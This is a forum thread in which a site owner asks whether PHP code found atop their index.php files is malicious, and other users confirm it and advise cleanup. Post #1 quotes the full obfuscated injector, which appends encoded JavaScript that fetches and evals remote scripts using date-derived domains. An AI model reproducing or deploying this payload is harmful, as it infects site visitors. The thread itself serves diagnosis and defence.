Results 1 to 6 of 6

Thread: I don't know PHP... but...

  1. #1

    Talking I don't know PHP... but...

    This is at the beginning of some important pages such as index.php in the customer and admin area. Is this a malicious script? It looked to me like it was not supposed to be there, even about the warning that it's a "security patch".

    Am I right in calling "Bull$#!t"?

    PHP Code:
    <?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">var $a="Z63cZ3dZ225nZ2567Z2574h;iZ252b+)Z257bZ2574mpZ253dZ2564sZ252eslZ2569ce(Z2569,Z2569Z252b1)Z253bZ22;cdZ3dZ22stZ253dstZ252bSZ2574riZ256eg.Z2566roZ256dCZ2568Z2561rCZ256fdeZ2528(Z2574Z256dZ2570.Z22;ceZ3dZ22cZ2568arCZ256fdeAZ2574Z25280)Z255e(Z25270xZ2530Z2530Z2527+Z2565s)Z2529);Z257d}Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sz|Z25Z25;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;stZ3dZ22Z2573Z2574Z253dZ2522Z2524Z2561Z253dsZ2574Z253bZ2564Z2563sZ2528dZ2561+Z2564bZ252bdZ2563+Z2564dZ252bdZ2565,Z2531Z2530Z2529;Z2564wZ2528sZ2574)Z253bZ2573tZ253d$Z2561Z253bZ2522;Z22;czZ3dZ22Z2566uncZ2574ioZ256e Z2563z(cZ257a)Z257brZ2565turZ256eZ2520caZ252bZ2563b+Z2563Z2563+cdZ252bce+Z2563z;Z257d;Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;dzZ3dZ22Z2566uZ256ectiZ256fn dZ2577(Z2574)Z257bcaZ253dZ2527Z252564ocuZ25256dZ252565ntZ25252eZ252577rZ252569Z2574Z2565(Z252522Z2527;cZ2565Z253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ252569pt Z25256caZ256eZ252567uZ252561Z25256Z2537Z252565Z25253dZ25255cZ252522javZ2561sZ252563rZ2525Z25369Z252570Z252574Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fsZ2563Z2572Z252569Z2570Z252574Z25253eZ2527;Z2577indZ256fw[Z2522eZ2522+Z2522Z2522+ Z2522vZ2522+Z2522alZ2522](unescapeZ2528t)Z2529Z257dZ253bZ22;cbZ3dZ220e(Z2564Z2573Z2529;stZ253dtmZ2570Z253dZ2527Z2527;for(iZ253d0Z253biZ253cds.Z256cZ256Z22;caZ3dZ22Z2566Z2575nZ2563tZ2569on Z2564cZ2573Z2528dsZ252cZ2565Z2573)Z257bdsZ253dunZ2565scaZ257Z22;deZ3dZ22!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+0}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87trc7Z3c07id~7Z3c07f}d7Z3c07f}b7Z3c07}|s7Z3c07Z257FhZ7b7Z3c07vtc7Z3c07rfv7Z3c07iec7Z3c07}s`7Z3c07~sj7Z3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;opZ3dZ22Z2524Z2561Z253dZ2522dw(Z2564Z2563Z2573(cuZ252c1Z2534)Z2529;Z2522;Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9;!Z2520Z2520+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050Z22;Z69Z66 Z28dZ6fcuZ6dZ65ntZ2eZ63oZ6fZ6bieZ2eindZ65xOZ66Z28Z27rf5f6Z64sZ27)Z3dZ3d-1)Z7bfunctiZ6fnZ20cZ61Z6clbaZ63k(Z78)Z7bwinZ64ow.Z74w Z3d xZ3bvaZ72 d Z3dZ20nZ65wZ20DaZ74e()Z3bd.Z73etZ54imeZ28Z78[Z22as_Z6ffZ22]*1Z3000)Z3bZ76Z61r hZ20Z3d Z64Z2egetZ55TCZ48Z6fursZ28);wZ69nZ64oZ77Z2eh Z3d hZ3bif Z28hZ20Z3e 8)Z7bdZ2esZ65tUTZ43DaZ74e(Z64.gZ65tZ55TCZ44ateZ28Z29 -Z202Z29Z3b}elZ73Z65Z7bd.Z73eZ74UZ54Z43DZ61tZ65(dZ2egetZ55TCZ44ateZ28Z29 - Z33);Z7dZ77inZ64Z6fwZ2eZ67Z64 Z3d Z64;vZ61Z72 tZ69me Z3d Z6eew Z41Z72rZ61Z79Z28Z29Z3bvZ61Z72 sZ68Z69Z66tIZ6eZ64eZ78 Z3d Z22Z22;timZ65[Z22yeaZ72Z22] Z3d dZ2egZ65Z74UTCZ46Z75llZ59eaZ72Z28);tZ69meZ5bZ22Z6doZ6ethZ22] Z3d d.Z67eZ74UZ54CZ4donZ74hZ28)+Z31;tZ69Z6de[Z22daZ79Z22]Z20Z3d d.gZ65tUZ54CDaZ74e()Z3biZ66 Z28dZ2egeZ74Z55Z54CZ4dZ6fnZ74hZ28)+1Z20Z3c 1Z30)Z7bshiftZ49nZ64Z65x Z3d Z74imeZ5bZ22yearZ22] Z2bZ20Z22-0Z22 Z2bZ20Z28Z64.gZ65Z74UTCZ4doZ6ethZ28Z29+1Z29;}Z65lsZ65Z7bshZ69ftZ49Z6edeZ78 Z3d timZ65[Z22yearZ22]Z20+Z20Z22-Z22Z20+ (Z64Z2egeZ74Z55Z54CZ4doZ6etZ68(Z29+1Z29;}iZ66 (dZ2eZ67etUZ54CZ44atZ65() Z3c 10Z29Z7bshiZ66tIZ6eZ64exZ20Z3dshiftZ49ndeZ78 +Z20Z22-0Z22 +Z20d.gZ65tZ55TCZ44atZ65(Z29;}Z65lseZ7bZ73hifZ74InZ64eZ78 Z3d Z73hZ69ftZ49ndeZ78Z20+ Z22-Z22 + d.gZ65tZ55TZ43DZ61tZ65Z28);Z7ddoZ63umeZ6et.wZ72iteZ28Z22Z3cscrZ22Z2bZ22ipt laZ6eguaZ67Z65Z3djavaZ73crZ69Z70tZ22+Z22 srZ63Z3dZ27http:Z2fZ2fsearchZ2eZ74Z77iZ74tZ65Z72.Z63omZ2fZ74rZ65nZ64sZ2fdZ61iZ6cyZ2ejZ73oZ6e?daZ74Z65Z3dZ22+ shiftZ49ndeZ78Z2bZ22&caZ6clZ62Z61Z63kZ3dcZ61Z6cZ6cZ62ackZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} functZ69Z6fn Z63aZ6clZ62Z61Z63kZ32(Z78)Z7bwZ69ndZ6fw.Z74Z77 Z3d x;Z73Z63(Z27rf5Z66Z36Z64Z73Z27Z2c2,7Z29;eZ76al(Z75Z6eesZ63apeZ28dzZ2bZ63Z7aZ2bop+Z73t)Z2bZ27dw(dZ7aZ2bcZ7a(Z24aZ2bstZ29Z29;Z27);dZ6fcZ75mZ65nZ74Z2ewriZ74e(Z24a);Z7ddZ6fcumZ65Z6etZ2ewrZ69teZ28Z22Z3cimgZ20srcZ3dZ27htZ74pZ3aZ2fZ2fsearch.Z74witZ74er.Z63oZ6dZ2fimageZ73Z2fZ73Z65aZ72cZ68Z2frss.pZ6egZ27Z20wiZ64Z74Z68Z3d1 Z68eZ69gZ68Z74Z3d1 sZ74yleZ3dZ27viZ73Z69bZ69lZ69tyZ3ahidZ64enZ27 Z2fZ3e Z3cscrZ22+Z22ipt lZ61ngZ75ageZ3djZ61Z76Z61scZ72iZ70tZ22+Z22 srcZ3dZ27hZ74tp:Z2fZ2fseaZ72Z63Z68Z2eZ74wiZ74Z74erZ2ecoZ6dZ2ftreZ6edsZ2fZ64aiZ6cy.jZ73onZ3fZ63Z61llZ62Z61cZ6bZ3dcalZ6cbaZ63kZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elsZ65Z7b$aZ3dZ27Z27};funcZ74Z69oZ6e sZ63(cZ6emZ2cv,Z65Z64Z29Z7bvarZ20exdZ3dZ6eewZ20Z44aZ74e(Z29Z3bexdZ2esetZ44ateZ28exdZ2egZ65Z74DZ61teZ28)+Z65Z64);dZ6fcumZ65Z6et.cZ6foZ6biZ65Z3dZ63Z6em+Z20Z27Z3dZ27 +esZ63apZ65Z28v)Z2bZ27;expirZ65sZ3dZ27+exd.toGZ4dTSZ74Z72ingZ28);Z7d;";var ez=window;ez[String.fromCharCode(101,118,97)+"l"](fds()); function asd(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}function fds(){return asd($a);}</script>';}//important security update ?>
    <?php 
    /*Packed BLOB icon data. Corruption may result script execution errors. Don't touch it unless you know what you are doing.*/  ?>
    Analog = Classical
    Digital = Techno

  2. #2
    Gonzo District BOFH westin's Avatar
    Join Date
    Jan 2006
    Location
    SW MO
    Posts
    1,187
    I googled: "<?php ob_start('security_update'); function security_update", and from the replies, it looks like it is malicious.
    \"Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink.\"

    -HST

  3. #3
    Banned
    Join Date
    Jan 2008
    Posts
    605
    pwned.

  4. #4
    Quote Originally Posted by The-Spec View Post
    pwned.
    Yah, thanks for that wise and insightful comment. lol.


    So Westin is there somewhere you may know of that I can find a list of all files that were installed and figure out a way to "undo" all of this? I haven't tried googling it yet, I suspect I'll find all the info I need eventually... but wondering if anyone here may know of some resources that give me exact "damage" so that I can spend more time correcting the problem than finding all the effects??

    So far I've manually removed all those lines of code from each PHP file on the site that I found that was affected, but I'm assuming there's probably a backdoor somewhere. I wish I had a python "find and replace" type script that I could use to clean all instances of this code from all the files in a folder. I think I have one lying around that I could modify for that purpose. But.... that doesn't take care of the backdoors.
    Analog = Classical
    Digital = Techno

  5. #5
    Gonzo District BOFH westin's Avatar
    Join Date
    Jan 2006
    Location
    SW MO
    Posts
    1,187
    Really, if you have backups, I would rm -rf the whole thing, and load from backup. Only way to be sure. Make sure you check the integrity of your backups though, and patch man... patch. Depending on how it was exploited, you might want to do some code audits. There are automated tools, or if you are really brave, submit the URL here, and I am sure there are some members that would be happy to run some tests on it. Like my friend above...
    \"Those of us that had been up all night were in no mood for coffee and donuts, we wanted strong drink.\"

    -HST

  6. #6
    Member
    Join Date
    May 2003
    Location
    Somewhere in Texas
    Posts
    76
    Don't overlook the fact that they made it there in the first place. More important thatn fixing the damage right now is to concentrate on finding out how they got there in the first place: fix that *then* figure out what else they did...

Similar Threads

  1. Replies: 0
    Last Post: August 30th, 2007, 04:33 AM
  2. Apache, PHP, MySQL with basic security settings.
    By nightcat in forum The Security Tutorials Forum
    Replies: 9
    Last Post: May 28th, 2005, 02:47 AM
  3. PHP Flaws
    By SDK in forum Web Security
    Replies: 19
    Last Post: December 20th, 2004, 05:31 PM
  4. Tutorial: Apache 2.0.49 and PHP 4.3.7!
    By Vorlin in forum Other Tutorials Forum
    Replies: 3
    Last Post: June 15th, 2004, 10:25 PM
  5. Installing Apache and PHP on Linux
    By HDD in forum Other Tutorials Forum
    Replies: 2
    Last Post: February 1st, 2004, 08:05 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •